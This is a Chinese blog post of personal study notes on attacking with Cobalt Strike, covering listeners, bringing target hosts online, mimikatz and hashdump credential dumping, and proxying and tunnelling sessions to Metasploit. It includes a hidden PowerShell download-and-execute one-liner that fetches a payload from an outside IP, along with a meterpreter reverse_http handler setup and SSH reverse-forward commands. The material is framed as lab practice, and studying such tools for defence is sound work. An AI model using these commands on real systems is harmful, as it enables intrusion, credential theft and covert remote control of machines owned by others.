• Cobaltstrike常用功能


    一、快捷工具栏

    3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作

    都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs

    放到公网上边,比较方便让靶机上线。

    4-6单个视图

    11、payload分为stage和stageless(相当于php大马,拥有所有的功能,包括meterpreter,很大,不

    需其他的管理器就能实现完全的交互,网络环境比较差的时候可以使用它,大并且容易查杀)

    12、已淘汰

    13、生成恶意Office宏攻击,嵌入恶意宏攻击。

    14、建立web_delivery是在内存上执行恶意代码,不会再服务器上留下文件的。

    查看进程:ps aux | grep teamserver

    kali -9 进程  干掉进程

    sudo yum install java-11-openjdk-devel(cs4.3版本java11环境)

    sudo yum list installed | grep java(查看已安装java)

    sudo alternatives --config java (切换环境)

    java -version(查看版本)

    export JAVA_HOME=$(dirname $(dirname $(readlink -f $(which java))))

    echo $JAVA_HOME     设置环境变量(此两条命令直接在命令行执行)

    sudo lsof -i :50050     查看端口状态

    ./msg  用户名  信息(发送给指定用户)

    二、创建监听器listener

    点击Cobalt strike——监听器——add

    获取靶机上线stager,任何靶机上线都是通过服务端

    查看端口是否在线  netstat -ano |grep 8080

    三、学习:cobaltrike实战演示1:

    创建完监听器后,想让靶机上线(那就攻击靶机)

    云服务器用作实验的话,如果安全组不需要特定要求,直接放通全部

    靶机上线操作:

    选择前边设置的监听器和方法(这里的方法我是用的是powershell)

    选择文件保存位置,这里我保存到桌面为了方便(这个是windows10做的客户端)

    之后需要再开启一个端口,让靶机可以下载这个文件,使用web-drive-by的host file,选择刚刚生

    成的文件

    复制下边内容

    http://39.99.136.38:9090/download/file.ext

    在靶机里边执行  (这使用的是windows7 64位操作系统)

    此时靶机已上线

    上线之后可以靶机进行一系列的控制

    这里是默认60秒的心跳间隔(真实环境可以不修改,容易被ids查杀)

    ①设置时间间隔

    ②在beacon中  sleep  2亦可以设置

    靶机想要下线就把进程(process)关掉,在这个界面退出会再次上线

    shell ipconfig 命令

    help 可以查看我们能执行的一些命令

    重要模块

    ②转移③内存中获取密码④不建议开启(vps带宽较小,很卡)

    screenshot截屏

    在视图界面可以查看

    亦可以端口扫描和查看进程

    四、学习:cobaltrike实战演示2:

    其他的监听器和attack进行一个主机上线,如下:

    设置端口,监听器(同样如上执行,可以上线)

    删除我们开启的东西

    ①mamager   web server

    ②attacks ——web-driver-by ——manager

    这如果在设置的时候没有copy,这里也是可以copy的

    想关掉,直接选中,点击kill

    端口扫描完可做如下操作:(三个视图模式)

    脚本可以github搜,选择一个路径导入cna,成功会显示ready(√)

    五、学习:cobaltrike攻击流程:

    拿root和system权限

    选择监听器和利用脚本

    自动打出去

    两个用户是不一样的

    ①hashdump命令或者②右击——执行——hash(读取用户哈希值)或者③右键run mimikatz's

    此时在任务管理器运行着powwershell.exe把它杀死了就没了(可以利用msf做进程迁移)

    先右击exit和remove把靶机移除掉(新操作)(因为直接remove会在自动上线)

    比较安全

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://35.12.32.156:9091/a'))"复制此代码到靶机去执行

    此处是dvwa靶场

    此时靶机又上线了

    靶机上线方法:

    ①命令执行②文件上传,上传webshell(工具执行连接),无报错有权限执行,靶机即可上线(如果

    cs是在内网中的,确定靶机能够连到cs)

    六、学习:cs和msf联动

    1、cs联动msf之socks代理(访问内网或者无法直接访问的服务器就需要建立代理)

    2、cs联动msf之外部监听器

    3、练习

    1、介绍:

    cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各

    类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。

    meterpreter的功能十分强大,模块非常多,攻击,辅助,编码等等,cs进行团队合作,进行主机

    的上线和smb的横向移动(内网管控平台)

    环境搭建条件:

    ①cs客户端一台windows10操作系统,一台centos7操作系统(或者kali操作系统也行)

    ②一台云服务器作为cs服务器(公网上vps)

    ③一台windows7(可联网),一台windows2012(不联网)

    操作步骤:

    ①socks  端口(如 socks  1234)

    可以在vps查看(netstat -ano|grep 1234)是否是监听状态

    如何连接代理(代理是对服务端的,客户端只是连接服务器,所有的操作都是在服务端即vps操作

    的)

    复制上述命令转到msf中执行

    此时整个msf就被代理到了1234端口,此时进行辅助端口扫描

    非常慢

    kali中操作

    在文件中写入如下内容保存

    此时还ping不了(ping在tcp/ip上一层(icmp)不能对ping代理转发,namp可以进行no ping 扫

    描)

    此时会很慢(因为走代理)

    虚拟机——物理网卡——运营商交换机——路由——vps服务器(此时就可扫描重要端口,不全

    扫)

    结果如下:

    2、学习:cs联动msf之外部监听器

    ①创建一个新的linstener

    转移时会开

    把system的sesion发给metetpreter

    kali中

    将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端)

    外网ping不通内网(即cs服务器无法通cs客户端)做代理转发

    保存退出

    重启生效(有隧道转发功能)

    执行此命令就可代理转发

    此时内网的8085端口和vps的8085端口就通了(去看拓扑图)

    选择上线的主机——右键span转移——选择监听器——外部的http8085 

    拿到meterpreter

    3、实操:操作步骤:

    这里是提权一下后的ssystem权限的用户

    ①在vps中    vi  /etc/ssh/sshd_config(sshd_config是服务端配置文件)

    ②AllowTcpForwarding yes

    GatewayPorts yes

    TCPKeepAlive yes

    PasswordAuthentication   yes

    ③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能)

    ④回到本地的 kali 中,通过 ssh 隧道做转发

    创建ssh隧道常用的参数:

    -C:压缩传输,提供传输速度

    -f :将ssh传输转入后台执行,不占用当前的shell

    -N:建立静默连接(建立了连接,但是看不到具体会话)

    -g:允许远程主机连接本地用于转发的端口

    -L:本地端口转发

    -R:远程端口转发

    -D:动态转发

    -P指定ssh端口

    ⑤命令执行:ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22

    含义解释:通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085

    端口上,而本地的 8085 端口上跑的又的监听器,所以,最终才造成 meterpreter本地上线的效

    果。

    ⑥netstat -anltup 查看正在工作的端口

    ⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口

    此处有错误可以查杀pid  kill  pid即可(ssh)

    ⑧创建一个新的监听器

    ⑨在kali中启用msfconsole,设置参数

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_http

    set lhost  192.168.129.139

    set lport 9999

    show options

    run

    ⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22

    最好检查一下是否设置成功:netstat -anltup(没有问题做如下操作)

    等待stage发送

    此时拿到了meterpreter(这个不知道是抽了什么风,重启虚拟机之后,我搞了两次才出来,多次

    尝试)比较卡,此时可以拿shell(如果显示乱码  chcp 65001),进程迁移,exit退出

    一、快捷工具栏

    二、创建监听器listener

    三、学习:cobaltrike实战演示1:

    四、学习:cobaltrike实战演示2:

    五、学习:cobaltrike攻击流程:

    六、学习:cs和msf联动

    1、介绍:

    2、学习:cs联动msf之外部监听器

    3、实操:操作步骤:


  • 相关阅读:
    vue3快速入门-生命周期
    vue3+vite使用viewerjs实现图片预览
    软考中级和高级,有什么区别?
    快速入门Docker
    云原生周刊:CNCF 宣布 Cilium 毕业 | 2023.10.16
    Thread类及常见方法
    C/C++/Windows/Linux文件操作
    C语言核心知识点总结
    【123. 买卖股票的最佳时机 III】
    Django系列:Django的项目结构与配置解析
  • 原文地址:https://blog.csdn.net/qq_52712762/article/details/139354210